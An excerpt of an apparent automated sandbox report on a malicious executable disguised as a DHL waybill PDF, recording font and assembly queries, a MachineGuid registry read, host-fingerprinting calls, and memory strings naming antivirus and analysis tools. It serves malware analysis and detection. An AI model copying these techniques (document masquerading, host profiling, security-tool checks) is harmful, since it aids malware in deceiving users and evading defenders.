            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_00418137 GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,11_2_00418137
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_004083A1 GetVersionExW,11_2_004083A1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 24_2_004073B6 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,24_2_004073B6
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: bdagent.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: MSASCui.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: avguard.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: avgrsx.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: avcenter.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: avp.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: zlclient.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
